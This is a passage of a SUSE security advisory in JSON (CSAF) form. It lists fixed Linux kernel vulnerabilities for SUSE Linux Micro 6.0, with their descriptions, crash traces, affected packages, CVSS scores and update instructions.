"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54030",
"url": "https://www.suse.com/security/cve/CVE-2023-54030"
},
{
"category": "external",
"summary": "SUSE Bug 1255691 for CVE-2023-54030",
"url": "https://bugzilla.suse.com/1255691"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54030"
},
{
"cve": "CVE-2023-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54031"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvdpa: Add queue index attr to vdpa_nl_policy for nlattr length check\n\nThe vdpa_nl_policy structure is used to validate the nlattr when parsing\nthe incoming nlmsg. It will ensure the attribute being described produces\na valid nlattr pointer in info-\u003eattrs before entering into each handler\nin vdpa_nl_ops.\n\nThat is to say, the missing part in vdpa_nl_policy may lead to illegal\nnlattr after parsing, which could lead to OOB read just like CVE-2023-3773.\n\nThis patch adds the missing nla_policy for vdpa queue index attr to avoid\nsuch bugs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54031",
"url": "https://www.suse.com/security/cve/CVE-2023-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1255583 for CVE-2023-54031",
"url": "https://bugzilla.suse.com/1255583"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54031"
},
{
"cve": "CVE-2023-54032",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54032"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race when deleting quota root from the dirty cow roots list\n\nWhen disabling quotas we are deleting the quota root from the list\nfs_info-\u003edirty_cowonly_roots without taking the lock that protects it,\nwhich is struct btrfs_fs_info::trans_lock. This unsynchronized list\nmanipulation may cause chaos if there\u0027s another concurrent manipulation\nof this list, such as when adding a root to it with\nctree.c:add_root_to_dirty_list().\n\nThis can result in all sorts of weird failures caused by a race, such as\nthe following crash:\n\n [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI\n [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.279928] Code: 85 38 06 00 (...)\n [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206\n [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000\n [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070\n [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b\n [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600\n [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48\n [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000\n [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0\n [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [337571.282874] Call Trace:\n [337571.283101] \u003cTASK\u003e\n [337571.283327] ? __die_body+0x1b/0x60\n [337571.283570] ? die_addr+0x39/0x60\n [337571.283796] ? exc_general_protection+0x22e/0x430\n [337571.284022] ? asm_exc_general_protection+0x22/0x30\n [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs]\n [337571.284803] ? _raw_spin_unlock+0x15/0x30\n [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs]\n [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs]\n [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs]\n [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410\n [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs]\n [337571.286358] ? mod_objcg_state+0xd2/0x360\n [337571.286577] ? refill_obj_stock+0xb0/0x160\n [337571.286798] ? seq_release+0x25/0x30\n [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0\n [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0\n [337571.287455] ? __x64_sys_ioctl+0x88/0xc0\n [337571.287675] __x64_sys_ioctl+0x88/0xc0\n [337571.287901] do_syscall_64+0x38/0x90\n [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n [337571.288352] RIP: 0033:0x7f478aaffe9b\n\nSo fix this by locking struct btrfs_fs_info::trans_lock before deleting\nthe quota root from that list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54032",
"url": "https://www.suse.com/security/cve/CVE-2023-54032"
},
{
"category": "external",
"summary": "SUSE Bug 1255617 for CVE-2023-54032",
"url": "https://bugzilla.suse.com/1255617"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54032"
},
{
"cve": "CVE-2023-54035",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54035"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix underflow in chain reference counter\n\nSet element addition error path decrements reference counter on chains\ntwice: once on element release and again via nft_data_release().\n\nThen, d6b478666ffa (\"netfilter: nf_tables: fix underflow in object\nreference counter\") incorrectly fixed this by removing the stateful\nobject reference count decrement.\n\nRestore the stateful object decrement as in b91d90368837 (\"netfilter:\nnf_tables: fix leaking object reference count\") and let\nnft_data_release() decrement the chain reference counter, so this is\ndone only once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54035",
"url": "https://www.suse.com/security/cve/CVE-2023-54035"
},
{
"category": "external",
"summary": "SUSE Bug 1255563 for CVE-2023-54035",
"url": "https://bugzilla.suse.com/1255563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54035"
},
{
"cve": "CVE-2023-54037",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54037"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: prevent NULL pointer deref during reload\n\nCalling ethtool during reload can lead to call trace, because VSI isn\u0027t\nconfigured for some time, but netdev is alive.\n\nTo fix it add rtnl lock for VSI deconfig and config. Set ::num_q_vectors\nto 0 after freeing and add a check for ::tx/rx_rings in ring related\nethtool ops.\n\nAdd proper unroll of filters in ice_start_eth().\n\nReproduction:\n$watch -n 0.1 -d \u0027ethtool -g enp24s0f0np0\u0027\n$devlink dev reload pci/0000:18:00.0 action driver_reinit\n\nCall trace before fix:\n[66303.926205] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[66303.926259] #PF: supervisor read access in kernel mode\n[66303.926286] #PF: error_code(0x0000) - not-present page\n[66303.926311] PGD 0 P4D 0\n[66303.926332] Oops: 0000 [#1] PREEMPT SMP PTI\n[66303.926358] CPU: 4 PID: 933821 Comm: ethtool Kdump: loaded Tainted: G OE 6.4.0-rc5+ #1\n[66303.926400] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.00.01.0014.070920180847 07/09/2018\n[66303.926446] RIP: 0010:ice_get_ringparam+0x22/0x50 [ice]\n[66303.926649] Code: 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 48 8b 87 c0 09 00 00 c7 46 04 e0 1f 00 00 c7 46 10 e0 1f 00 00 48 8b 50 20 \u003c48\u003e 8b 12 0f b7 52 3a 89 56 14 48 8b 40 28 48 8b 00 0f b7 40 58 48\n[66303.926722] RSP: 0018:ffffad40472f39c8 EFLAGS: 00010246\n[66303.926749] RAX: ffff98a8ada05828 RBX: ffff98a8c46dd060 RCX: ffffad40472f3b48\n[66303.926781] RDX: 0000000000000000 RSI: ffff98a8c46dd068 RDI: ffff98a8b23c4000\n[66303.926811] RBP: ffffad40472f3b48 R08: 00000000000337b0 R09: 0000000000000000\n[66303.926843] R10: 0000000000000001 R11: 0000000000000100 R12: ffff98a8b23c4000\n[66303.926874] R13: ffff98a8c46dd060 R14: 000000000000000f R15: ffffad40472f3a50\n[66303.926906] FS: 00007f6397966740(0000) GS:ffff98b390900000(0000) knlGS:0000000000000000\n[66303.926941] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[66303.926967] CR2: 0000000000000000 CR3: 000000011ac20002 CR4: 00000000007706e0\n[66303.926999] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[66303.927029] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[66303.927060] PKRU: 55555554\n[66303.927075] Call Trace:\n[66303.927094] \u003cTASK\u003e\n[66303.927111] ? __die+0x23/0x70\n[66303.927140] ? page_fault_oops+0x171/0x4e0\n[66303.927176] ? exc_page_fault+0x7f/0x180\n[66303.927209] ? asm_exc_page_fault+0x26/0x30\n[66303.927244] ? ice_get_ringparam+0x22/0x50 [ice]\n[66303.927433] rings_prepare_data+0x62/0x80\n[66303.927469] ethnl_default_doit+0xe2/0x350\n[66303.927501] genl_family_rcv_msg_doit.isra.0+0xe3/0x140\n[66303.927538] genl_rcv_msg+0x1b1/0x2c0\n[66303.927561] ? __pfx_ethnl_default_doit+0x10/0x10\n[66303.927590] ? __pfx_genl_rcv_msg+0x10/0x10\n[66303.927615] netlink_rcv_skb+0x58/0x110\n[66303.927644] genl_rcv+0x28/0x40\n[66303.927665] netlink_unicast+0x19e/0x290\n[66303.927691] netlink_sendmsg+0x254/0x4d0\n[66303.927717] sock_sendmsg+0x93/0xa0\n[66303.927743] __sys_sendto+0x126/0x170\n[66303.927780] __x64_sys_sendto+0x24/0x30\n[66303.928593] do_syscall_64+0x5d/0x90\n[66303.929370] ? __count_memcg_events+0x60/0xa0\n[66303.930146] ? count_memcg_events.constprop.0+0x1a/0x30\n[66303.930920] ? handle_mm_fault+0x9e/0x350\n[66303.931688] ? do_user_addr_fault+0x258/0x740\n[66303.932452] ? exc_page_fault+0x7f/0x180\n[66303.933193] entry_SYSCALL_64_after_hwframe+0x72/0xdc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54037",
"url": "https://www.suse.com/security/cve/CVE-2023-54037"
},
{
"category": "external",
"summary": "SUSE Bug 1255557 for CVE-2023-54037",
"url": "https://bugzilla.suse.com/1255557"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54037"
},
{
"cve": "CVE-2023-54038",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54038"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_conn: return ERR_PTR instead of NULL when there is no link\n\nhci_connect_sco currently returns NULL when there is no link (i.e. when\nhci_conn_link() returns NULL).\n\nsco_connect() expects an ERR_PTR in case of any error (see line 266 in\nsco.c). Thus, hcon set as NULL passes through to sco_conn_add(), which\ntries to get hcon-\u003ehdev, resulting in dereferencing a NULL pointer as\nreported by syzkaller.\n\nThe same issue exists for iso_connect_cis() calling hci_connect_cis().\n\nThus, make hci_connect_sco() and hci_connect_cis() return ERR_PTR\ninstead of NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54038",
"url": "https://www.suse.com/security/cve/CVE-2023-54038"
},
{
"category": "external",
"summary": "SUSE Bug 1255540 for CVE-2023-54038",
"url": "https://bugzilla.suse.com/1255540"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
